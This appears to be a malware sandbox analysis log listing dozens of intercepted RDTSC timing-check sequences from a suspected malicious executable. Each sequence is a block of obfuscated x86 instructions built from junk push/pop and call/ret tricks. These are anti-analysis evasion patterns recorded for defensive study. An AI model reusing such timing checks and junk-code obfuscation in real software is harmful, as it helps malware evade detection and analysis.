                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59F33E second address: 59F434 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC57CD4ECF8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov esi, dword ptr [ebp+122D38E6h] 0x00000013 or esi, dword ptr [ebp+122D332Dh] 0x00000019 push 00000000h 0x0000001b mov ecx, dword ptr [ebp+122D2794h] 0x00000021 push 4BF2264Eh 0x00000026 jno 00007FC57CD4ED15h 0x0000002c xor dword ptr [esp], 4BF226CEh 0x00000033 pushad 0x00000034 sub cx, C788h 0x00000039 jmp 00007FC57CD4ED06h 0x0000003e popad 0x0000003f clc 0x00000040 push 00000003h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FC57CD4ECF8h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c push 00000000h 0x0000005e mov edi, ebx 0x00000060 push 00000003h 0x00000062 cmc 0x00000063 push B1ABA0B9h 0x00000068 jmp 00007FC57CD4ED06h 0x0000006d xor dword ptr [esp], 71ABA0B9h 0x00000074 jmp 00007FC57CD4ED03h 0x00000079 lea ebx, dword ptr [ebp+12449FCCh] 0x0000007f jmp 00007FC57CD4ED09h 0x00000084 push eax 0x00000085 push eax 0x00000086 push edx 0x00000087 push edi 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59F434 second address: 59F439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59F439 second address: 59F43E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59F519 second address: 59F55B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C325h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 4C3DD538h 0x00000010 mov dx, si 0x00000013 cld 0x00000014 lea ebx, dword ptr [ebp+12449FD7h] 0x0000001a pushad 0x0000001b or di, 370Fh 0x00000020 popad 0x00000021 mov edi, dword ptr [ebp+122D18B6h] 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a push edx 0x0000002b jp 00007FC57C52C316h 0x00000031 pop edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 59F55B second address: 59F561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5B1437 second address: 5B143D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C1089 second address: 5C1093 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC57CD4ECF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5943A9 second address: 5943D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C31Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC57C52C327h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5BF469 second address: 5BF46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5BF46F second address: 5BF489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57C52C325h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5BF5D0 second address: 5BF5D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5BF5D9 second address: 5BF5E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC57C52C316h 0x00000008 jo 00007FC57C52C316h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5BF745 second address: 5BF74F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5B2C0C second address: 5B2C16 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC57C52C316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C01DD second address: 5C01F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC57CD4ECF6h 0x0000000a pop edi 0x0000000b popad 0x0000000c pushad 0x0000000d jo 00007FC57CD4ECFCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C01F2 second address: 5C0200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007FC57C52C316h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C0200 second address: 5C0210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FC57CD4ECF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C0210 second address: 5C0216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C0216 second address: 5C0233 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED09h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C0A7D second address: 5C0A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC57C52C322h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C0A98 second address: 5C0A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C0EBB second address: 5C0EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C0EBF second address: 5C0EC9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC57CD4ECF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C6B1E second address: 5C6B3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC57C52C329h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C6B3D second address: 5C6B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 595F3A second address: 595F68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C31Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC57C52C325h 0x0000000e jg 00007FC57C52C316h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB862 second address: 5CB879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57CD4ED03h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB879 second address: 5CB88F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC57C52C316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC57C52C31Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB88F second address: 5CB89F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC57CD4ECF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB89F second address: 5CB8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB8A4 second address: 5CB8AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CADF3 second address: 5CAE3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C328h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FC57C52C329h 0x0000000f push esi 0x00000010 jmp 00007FC57C52C31Ah 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CAE3D second address: 5CAE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CAE41 second address: 5CAE5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C31Eh 0x00000007 jns 00007FC57C52C316h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB381 second address: 5CB3CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ECFBh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007FC57CD4ED07h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 jmp 00007FC57CD4ECFEh 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e jnl 00007FC57CD4ECF6h 0x00000024 push edx 0x00000025 pop edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB6FD second address: 5CB708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC57C52C316h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB708 second address: 5CB70E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB70E second address: 5CB712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB712 second address: 5CB71B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CEC82 second address: 5CECA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC57C52C322h 0x00000008 jo 00007FC57C52C316h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CECA6 second address: 5CECAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CEE1A second address: 5CEE1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CEFEE second address: 5CEFF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CEFF2 second address: 5CEFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CF2F1 second address: 5CF2F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CF2F7 second address: 5CF30E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC57C52C31Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CF30E second address: 5CF314 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CFA3F second address: 5CFA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CFBCF second address: 5CFBD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CFC98 second address: 5CFC9D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D0CD7 second address: 5D0CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FC57CD4ECFDh 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D3021 second address: 5D3025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D3025 second address: 5D30CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ECFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FC57CD4ECF8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edi, 712391D9h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c sub dword ptr [ebp+12449B5Bh], eax 0x00000032 pop edi 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007FC57CD4ECF8h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f pushad 0x00000050 sub eax, 5D905E20h 0x00000056 jo 00007FC57CD4ED0Bh 0x0000005c jmp 00007FC57CD4ED05h 0x00000061 popad 0x00000062 push eax 0x00000063 jnp 00007FC57CD4ED2Bh 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FC57CD4ED07h 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D38C6 second address: 5D38DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 ja 00007FC57C52C316h 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D38DA second address: 5D38DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D567D second address: 5D5683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D5683 second address: 5D5687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 58A14D second address: 58A17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 push ecx 0x00000014 jmp 00007FC57C52C329h 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D5DAE second address: 5D5DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D5DB2 second address: 5D5DBC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC57C52C31Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D684C second address: 5D6851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D6639 second address: 5D663D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D6851 second address: 5D6856 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D6856 second address: 5D691A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC57C52C316h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jnp 00007FC57C52C33Ah 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FC57C52C318h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f movzx esi, di 0x00000032 push 00000000h 0x00000034 mov edi, dword ptr [ebp+122D1BFEh] 0x0000003a mov si, EB32h 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ecx 0x00000043 call 00007FC57C52C318h 0x00000048 pop ecx 0x00000049 mov dword ptr [esp+04h], ecx 0x0000004d add dword ptr [esp+04h], 0000001Ah 0x00000055 inc ecx 0x00000056 push ecx 0x00000057 ret 0x00000058 pop ecx 0x00000059 ret 0x0000005a jmp 00007FC57C52C328h 0x0000005f xchg eax, ebx 0x00000060 jmp 00007FC57C52C326h 0x00000065 push eax 0x00000066 pushad 0x00000067 js 00007FC57C52C31Ch 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DA79B second address: 5DA7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D9A03 second address: 5D9A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DA92F second address: 5DA939 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC57CD4ECF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D9A08 second address: 5D9A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DA939 second address: 5DA9CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jp 00007FC57CD4ECF6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f call 00007FC57CD4ECFFh 0x00000014 pop ebx 0x00000015 push dword ptr fs:[00000000h] 0x0000001c jmp 00007FC57CD4ED08h 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov ebx, dword ptr [ebp+122D36E2h] 0x0000002e mov eax, dword ptr [ebp+122D09D1h] 0x00000034 mov dword ptr [ebp+122D1C9Bh], eax 0x0000003a push FFFFFFFFh 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FC57CD4ECF8h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 nop 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FC57CD4ED05h 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DB8EC second address: 5DB8F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DD87C second address: 5DD886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC57CD4ECF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DB8F0 second address: 5DB8F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DD886 second address: 5DD8E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007FC57CD4ECFAh 0x0000000f nop 0x00000010 xor bl, 0000006Dh 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FC57CD4ECF8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f sub bh, FFFFFFE1h 0x00000032 jmp 00007FC57CD4ED07h 0x00000037 push 00000000h 0x00000039 sbb di, 7CA1h 0x0000003e push eax 0x0000003f push edx 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DC9CF second address: 5DC9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DC9D3 second address: 5DC9F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007FC57CD4ED01h 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DDA60 second address: 5DDA66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DE5D0 second address: 5DE5F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC57CD4ECFCh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DDA66 second address: 5DDA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DE5F8 second address: 5DE60E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC57CD4ECF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jns 00007FC57CD4ECF6h 0x00000015 pop esi 0x00000016 rdtsc
